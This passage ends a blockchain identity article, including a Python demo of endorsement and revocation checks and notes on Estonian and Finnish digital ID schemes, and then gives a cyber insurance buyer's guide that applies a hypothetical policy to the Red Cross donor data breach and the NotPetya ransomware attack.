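    r["untrusted_endorser_rejected"] = not c.verify(PASSPORT, {PASSPORT_OFFICE})
    c.endorse(PASSPORT_OFFICE, ah)
    r["endorsed_accepted"] = c.verify(PASSPORT, {PASSPORT_OFFICE})
    tampered = PASSPORT.replace(b"1990", b"1980")   # one changed field, new hash
    r["tampered_rejected"] = not c.verify(tampered, {PASSPORT_OFFICE})
    try:
        c.add_attribute(RANDOM_ACCOUNT, "licence", b"not alice's document")
        r["nonowner_blocked"] = False
    except PermissionError:
        r["nonowner_blocked"] = True
    c.revoke(PASSPORT_OFFICE, ah)
    r["revoked_rejected"] = not c.verify(PASSPORT, {PASSPORT_OFFICE})
    return r


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

Two points the model makes visible: trust lives with the verifier's list of endorsers, not in the contract, so an endorsement from an arbitrary account proves nothing; and because only hashes are stored, re-issuing a document (a renewed passport) silently invalidates every endorsement on the old one, which is the right outcome but one the identity owner has to plan for.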
Estonia is another country with high adoption of this kind of technology, much of it based on identity management (X-Road) for its residents through its e-residency programme. Finland uses Ethereum Smart ID for refugees' identity management, and provides asylum seekers with MONI debit cards linked to their identity on the blockchain. Its Immigration Service uses this to track both the spending and the identity of these refugees, with the added benefit that the blockchain data is immutable and incontestable. With Smart IDs, individuals can create and securely store a digital form of identification that cannot be tampered with and is universally accessible. For the technology to succeed, institutions will need to incorporate Smart IDs gradually alongside existing ID systems, not target them as replacements. If done correctly, this can have a far-reaching impact on how individuals, organisations and society validate and verify identity, conduct business and avail themselves of services. "I AM WHO I AM", said God to Moses, to assure him that God would become whatever they needed Him to become; the rest of us lesser mortals will need to continue to prove who we are, and in the near future Smart ID may be a reality closer to home, helping us do just that.
Cyber Insurance: A Buyer's Guide, Part 3
By Mark Luckin

In this third article in our series about cyber insurance, we're looking at two publicised examples of how a Cyber & Privacy Liability Insurance policy might respond to certain instances of unauthorised access or data breach. The first was caused by human error and the second looks at an attack by an intentionally malicious third party. Of note, whilst this refers to publicly available information with respect to potential policy application, assumptions are made, and all applications are entirely hypothetical. These hypotheticals assume the organisations have in place an equivalent market-leading cyber insurance policy.
Red Cross: Human Error – Data Breach

On 5 September 2016, a database file containing information relating to approximately 550,000 prospective blood donors, who had entered their details into the Red Cross (the insured) website, was saved to a public-facing web server. The file was inadvertently placed on the web server by an employee of a third-party provider. As a result, the data file was discovered and accessed by an unknown individual on 25 October 2016. This led to a data breach which, if it occurred now, would potentially need to be notified to the OAIC and to impacted individuals under the recently introduced Mandatory Breach Notification scheme. The breach could also have a significant impact on the organisation's reputation. The below outlines how a cyber insurance policy may respond in such an event, to assist an organisation in the event of a breach.
Insuring Clause

Whilst there is no standard cyber insurance wording within the Australian market, we assume the Red Cross has a market-leading policy in place. The above scenario involves an event, loss or claim that would potentially trigger a number of Insuring Clauses broadly covering:
- Data asset loss/rectification costs;
- Regulatory/privacy liability;
- Third party liability.
Once triggered, these clauses respond in a unique way: the policy provides not only a promise to pay but also a response team service. The combination is outlined below.

First Party Loss

With such a breach come associated first party costs to investigate, contain, mitigate and remedy the occurrence from an IT, IS, legal, communications and broader business perspective. Assuming a policy was in place, it has the potential to offer assistance in the following ways:
Immediate Costs

Once the insured is made aware of the breach, their Insurer's Response Team is contacted for assistance. In this scenario the insured has already met and familiarised themselves with the Breach Response team, allowing initial contact in the event of the breach to be streamlined and efficient. As previously outlined, the response team consists of IT, legal, communications and other professional service vendors to assist in the event of the claim.
- Immediately, an IT forensic response team is engaged to determine the scope, cause and extent of the breach, to stop any continuation of it, and to assist in minimising the resulting harm. The team works with the organisation's internal IT group, with their services completely covered under the policy. Despite the breach being the fault of a third party, the policy is still triggered, as the insured sought a market-leading policy providing cover for both their own breaches and third-party breaches of their data.
- Simultaneously, a law firm is engaged to advise the organisation, assisting in:
  o Determining immediate legal obligations/requirements under the Privacy Act and the Mandatory Breach Notification Scheme;
  o Determining any immediate legal obligations to third parties;
  o Providing any other immediate regulatory/legal advice associated with the breach.
- Public relations/communications experts are also engaged to minimise the reputational impact of the incident, by assisting in formulating appropriate and immediate communication to the public and impacted individuals.
Slow Burn Costs

Following the immediate response, over a period of days, weeks and potentially months, the claims response team remains engaged in varying capacities:
- Forensic IT assessment of the information accessed continues, to ensure the insured has as full an understanding as possible of the severity of the breach and of the amount and type of data breached.
- Depending on what information was involved in the breach:
  o Credit monitoring services are engaged for affected individuals.
  o Identity theft monitoring services are engaged for affected individuals.
- Costs to set up and operate a call centre for inquiries by impacted individuals are covered.
- Public relations/communications experts continue to be engaged to minimise the reputational impact of the incident, providing ongoing assistance with communications and releases around the incident.
- Legal advice/consultation continues, assisting with:
  o The assessment period under the new scheme.
  o Any legal obligations to notify affected individuals and the OAIC.
  o Any other regulatory/legal advice associated with the breach.
Third Party Loss

In addition to first party loss sustained by the insured, this breach of personal information can lead to third party liability exposure. Here the policy has the potential to assist the insured in the following ways:
- Defence expenses arising from a regulatory investigation. The insured may find themselves party to an investigation by the OAIC, especially given the introduction of the new scheme. Legal costs associated with advice and assessment under the new scheme would be covered.
  o Should a claim then arise, with a regulator pursuing action resulting from the breach, the associated costs and any monetary fine or penalty (to the extent insurable by law) would be covered under the policy.
- Non-regulatory action may also be pursued by third parties as a result of the data breach. Defence and settlement costs for associated claims would also be covered. Note that coverage is afforded only for claims arising as a result of a defined breach or wrongful act.
Business Interruption

In the above instance, there has been no business interruption loss; however, the policy remains ready to respond.

Important notes

The above situation is an important reminder that outsourcing services, including the storage of data, does not necessarily relieve the original data holder of responsibility, and that a correctly implemented policy can respond in such an instance.

NotPetya: Attack/Human Error – Unauthorised Access

In June 2017 the NotPetya attack was launched, targeting Microsoft Windows-based systems and infecting the master boot record to execute a payload. The payload encrypted organisations' systems, preventing Windows from booting, and demanded that the user make a payment in Bitcoin in order to regain access to the system. In practice that payment route was never a viable recovery path: the attackers' contact email address was taken down within hours of the outbreak, and the malware's key handling left no way to derive a decryption key even if the ransom was paid, a point worth keeping in mind wherever ransom payment is weighed up as an option. Publicly available information indicated that the global law firm DLA Piper was impacted by the attack. The scenario is unusual in that it contains elements of both an "attack" as such and human error. The paragraphs below describe a hypothetical situation, as to how a cyber insurance policy may have assisted at the commencement of, during and in the aftermath of such an incident.
Insuring Clause

The above again assumes the insured has a market leading policy in place. The above scenario involves an event, loss or claim that would potentially trigger a number of Insuring Clauses, broadly covering:

- Data Asset Loss/Rectification Costs.
- Extortion Costs.
- Business Interruption Loss.
- Regulatory/Privacy Liability.
- Third Party Liability.

Once triggered, the above clauses respond in the same unique capacity as outlined below.
First Party Loss

There is an obvious immediate impact on an organisation from such an event, including unauthorised access to its systems, lack of access and potential data loss/breach.

Immediate Costs

Again, once the insured becomes aware of the incident, the incident response team is engaged, aiding by:

- IT/forensic consultants are engaged to assess backup capabilities and simultaneously assess the ransomware, analyse its impact, and calculate the extent of the potential impact and/or loss.
- Costs associated with addressing the extortion threat to release information or malicious code unless extortion monies are paid.
  o Potential payment of the ransom is considered here, should this prove to be the most appropriate course of action.
- Simultaneously, a law firm is engaged to advise the organisation and assist in:
  o Determining any immediate legal obligations to associated third parties whose data may have been breached.
  o Determining legal obligations under the Privacy Act and the Mandatory Breach Notification Scheme.
  o Assisting with any other immediate regulatory/legal advice associated with the breach.
- Public relations/communications experts are also engaged to minimise the reputational impact of the incident by providing assistance in formulating appropriate and immediate communications and delivery around the incident.

Slow Burn Costs

- IT/IS assistance remains and over the following days/weeks/months assists with:
  o Recovery costs to remove malware, reconstruct insured data and assist with restoration, including decontamination and recovery.
  o Software restoration (computer hardware if required). IT assistance in returning systems to their pre-incident level following a cyber incident. This can include assistance with restoration of systems and data as well as associated IT forensic costs.
- Communications experts remain engaged for the period of outage, assisting in delivering the right messages and updates to all involved/impacted parties associated with the incident, helping to mitigate reputational damage.
- Legal advice/consultation continues to assist with:
  o Ongoing advice with respect to any regulatory risk or third party liability associated with the breach.
Third Party

In addition to First Party Loss sustained by the insured, this breach of personal information can lead to third party liability exposure. In this sense, the policy has the potential to assist the insured in the following ways:

- Defence expenses arising from regulatory investigations. The insured may find themselves party to an investigation from a number of different regulators, dependent on organisation type and industry. Legal costs associated with advice resulting from potential or actual liability arising from the actions of regulators as a result of the incident would be covered.
  o Should a claim then arise with a regulator pursuing action resulting from a breach, associated costs and any monetary fine or penalty (unless uninsurable by law) would be covered under the policy.
- Separate action may also be pursued by third parties resulting from the incident. This may be due to various obligations, contractual or otherwise, owed to such parties. Cover is afforded for damages sought through a written demand or a civil or administrative proceeding resulting from a breach or wrongful act. Defence and settlement costs for associated claims would also be covered.
Business Interruption

Unfortunately, unlike our first scenario, the insured faces a legitimate business interruption exposure. An inability to access systems and associated data could have a significant impact on the ongoing viability of the organisation. Fortunately, the policy responds to provide the following coverage:

- Loss of net income. From the time the business interruption is first discovered until net income returns to the level it would have been at had the event not occurred, the policy will respond to provide cover for loss of net income during this period.
- Cover for additional costs required to continue normal business operations (as a direct result of the interruption) during this period is also provided. This can include costs for items such as payroll and costs around the functionality and/or service of the insured's business.
Summary

The above outlines a hypothetical application of a policy to two well publicised incidents. As shown, a correctly implemented and tailored policy can afford an organisation a broad remit of cover and assistance in the event of a cyber and/or privacy related incident. These policies work most effectively for organisations which approach cyber and privacy risk as a whole-of-organisation risk, educating all staff and addressing the risk at board level.